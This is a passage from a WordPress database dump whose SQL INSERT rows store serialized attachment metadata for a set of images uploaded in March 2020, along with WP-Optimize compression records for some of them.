th\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"girl-kite-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:19:\"girl-kite-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:21:\"girl-kite-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:21:\"girl-kite-250x157.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:21:\"girl-kite-287x180.jpg\";s:5:\"width\";i:287;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:21:\"girl-kite-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(90840,260651,'_wp_attached_file','2020/03/heart-cloud.jpg'),(90841,260651,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:338;s:6:\"height\";i:212;s:4:\"file\";s:23:\"2020/03/heart-cloud.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"heart-cloud-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"heart-cloud-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:21:\"heart-cloud-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:23:\"heart-cloud-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:23:\"heart-cloud-250x157.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:23:\"heart-cloud-287x180.jpg\";s:5:\"width\";i:287;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:23:\"heart-cloud-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(90842,260652,'_wp_attached_file','2020/03/hot-air-balloon-abstract.jpg'),(90843,260652,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:376;s:6:\"height\";i:212;s:4:\"file\";s:36:\"2020/03/hot-air-balloon-abstract.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"hot-air-balloon-abstract-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"hot-air-balloon-abstract-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:34:\"hot-air-balloon-abstract-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:36:\"hot-air-balloon-abstract-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:36:\"hot-air-balloon-abstract-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:36:\"hot-air-balloon-abstract-319x180.jpg\";s:5:\"width\";i:319;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:36:\"hot-air-balloon-abstract-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(90844,260653,'_wp_attached_file','2020/03/long-road.jpg'),(90845,260653,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:317;s:6:\"height\";i:212;s:4:\"file\";s:21:\"2020/03/long-road.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"long-road-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"long-road-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:19:\"long-road-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:21:\"long-road-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:21:\"long-road-250x167.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:167;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:21:\"long-road-269x180.jpg\";s:5:\"width\";i:269;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:21:\"long-road-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(90846,260654,'_wp_attached_file','2020/03/mtn-path-1.jpg'),(90847,260654,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:376;s:6:\"height\";i:212;s:4:\"file\";s:22:\"2020/03/mtn-path-1.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"mtn-path-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"mtn-path-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:20:\"mtn-path-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:22:\"mtn-path-1-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:22:\"mtn-path-1-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:22:\"mtn-path-1-319x180.jpg\";s:5:\"width\";i:319;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:22:\"mtn-path-1-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(90848,260655,'_wp_attached_file','2020/03/pink-tree.jpg'),(90849,260655,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:338;s:6:\"height\";i:212;s:4:\"file\";s:21:\"2020/03/pink-tree.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"pink-tree-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"pink-tree-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:19:\"pink-tree-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:21:\"pink-tree-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:21:\"pink-tree-250x157.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:21:\"pink-tree-287x180.jpg\";s:5:\"width\";i:287;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:21:\"pink-tree-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(90850,260656,'_wp_attached_file','2020/03/red-poppy-field.jpg'),(90851,260656,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:376;s:6:\"height\";i:212;s:4:\"file\";s:27:\"2020/03/red-poppy-field.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"red-poppy-field-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"red-poppy-field-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:25:\"red-poppy-field-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:27:\"red-poppy-field-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:27:\"red-poppy-field-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:27:\"red-poppy-field-319x180.jpg\";s:5:\"width\";i:319;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:27:\"red-poppy-field-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(90852,260657,'_wp_attached_file','2020/03/seashells-abstract.jpg'),(90853,260657,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:338;s:6:\"height\";i:212;s:4:\"file\";s:30:\"2020/03/seashells-abstract.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"seashells-abstract-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"seashells-abstract-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:28:\"seashells-abstract-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:30:\"seashells-abstract-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:30:\"seashells-abstract-250x157.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:30:\"seashells-abstract-287x180.jpg\";s:5:\"width\";i:287;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:30:\"seashells-abstract-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(90854,260658,'_wp_attached_file','2020/03/stones-sunset.jpg'),(90855,260658,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:332;s:6:\"height\";i:212;s:4:\"file\";s:25:\"2020/03/stones-sunset.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"stones-sunset-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"stones-sunset-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:23:\"stones-sunset-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:25:\"stones-sunset-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:25:\"stones-sunset-250x160.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:25:\"stones-sunset-282x180.jpg\";s:5:\"width\";i:282;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:25:\"stones-sunset-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(90856,260659,'_wp_attached_file','2020/03/sunflower-field.jpg'),(90857,260659,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:376;s:6:\"height\";i:212;s:4:\"file\";s:27:\"2020/03/sunflower-field.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"sunflower-field-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"sunflower-field-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:25:\"sunflower-field-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:27:\"sunflower-field-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:27:\"sunflower-field-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:27:\"sunflower-field-319x180.jpg\";s:5:\"width\";i:319;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:27:\"sunflower-field-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(90858,260660,'_wp_attached_file','2020/03/surreal-child-bike.jpg'),(90859,260660,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:376;s:6:\"height\";i:212;s:4:\"file\";s:30:\"2020/03/surreal-child-bike.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"surreal-child-bike-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"surreal-child-bike-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:28:\"surreal-child-bike-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:30:\"surreal-child-bike-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:30:\"surreal-child-bike-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:30:\"surreal-child-bike-319x180.jpg\";s:5:\"width\";i:319;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:30:\"surreal-child-bike-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(90860,260661,'_wp_attached_file','2020/03/tree-blue-field.jpg'),(90861,260661,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:338;s:6:\"height\";i:212;s:4:\"file\";s:27:\"2020/03/tree-blue-field.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"tree-blue-field-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"tree-blue-field-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:25:\"tree-blue-field-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:27:\"tree-blue-field-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:27:\"tree-blue-field-250x157.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:27:\"tree-blue-field-287x180.jpg\";s:5:\"width\";i:287;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:27:\"tree-blue-field-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(90862,260662,'_wp_attached_file','2020/03/wood-bridge-nature.jpg'),(90863,260662,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:315;s:6:\"height\";i:212;s:4:\"file\";s:30:\"2020/03/wood-bridge-nature.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"wood-bridge-nature-300x202.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:202;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"wood-bridge-nature-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:28:\"wood-bridge-nature-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:30:\"wood-bridge-nature-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:30:\"wood-bridge-nature-250x168.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:168;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:30:\"wood-bridge-nature-267x180.jpg\";s:5:\"width\";i:267;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:30:\"wood-bridge-nature-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(90864,260657,'original-file','2020/03/seashells-abstract-updraft-pre-smush-original.jpg'),(90865,260657,'smush-info','The file was compressed from 25.25 KB to 24.00 KB saving 4.95 percent using WP-Optimize'),(90866,260657,'smush-complete','1'),(90867,260657,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:25857;s:12:\"smushed-size\";i:24577;s:15:\"savings-percent\";d:4.95;}');
INSERT INTO `wpcl_postmeta` VALUES (90868,260656,'original-file','2020/03/red-poppy-field-updraft-pre-smush-original.jpg'),(90869,260656,'smush-info','The file was compressed from 26.07 KB to 24.93 KB saving 4.38 percent using WP-Optimize'),(90870,260656,'smush-complete','1'),(90871,260656,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:26697;s:12:\"smushed-size\";i:25528;s:15:\"savings-percent\";d:4.38;}'),(90872,260648,'original-file','2020/03/blue-water-rose-updraft-pre-smush-original.jpg'),(90873,260648,'smush-info','The file was compressed from 14.56 KB to 13.82 KB saving 5.08 percent using 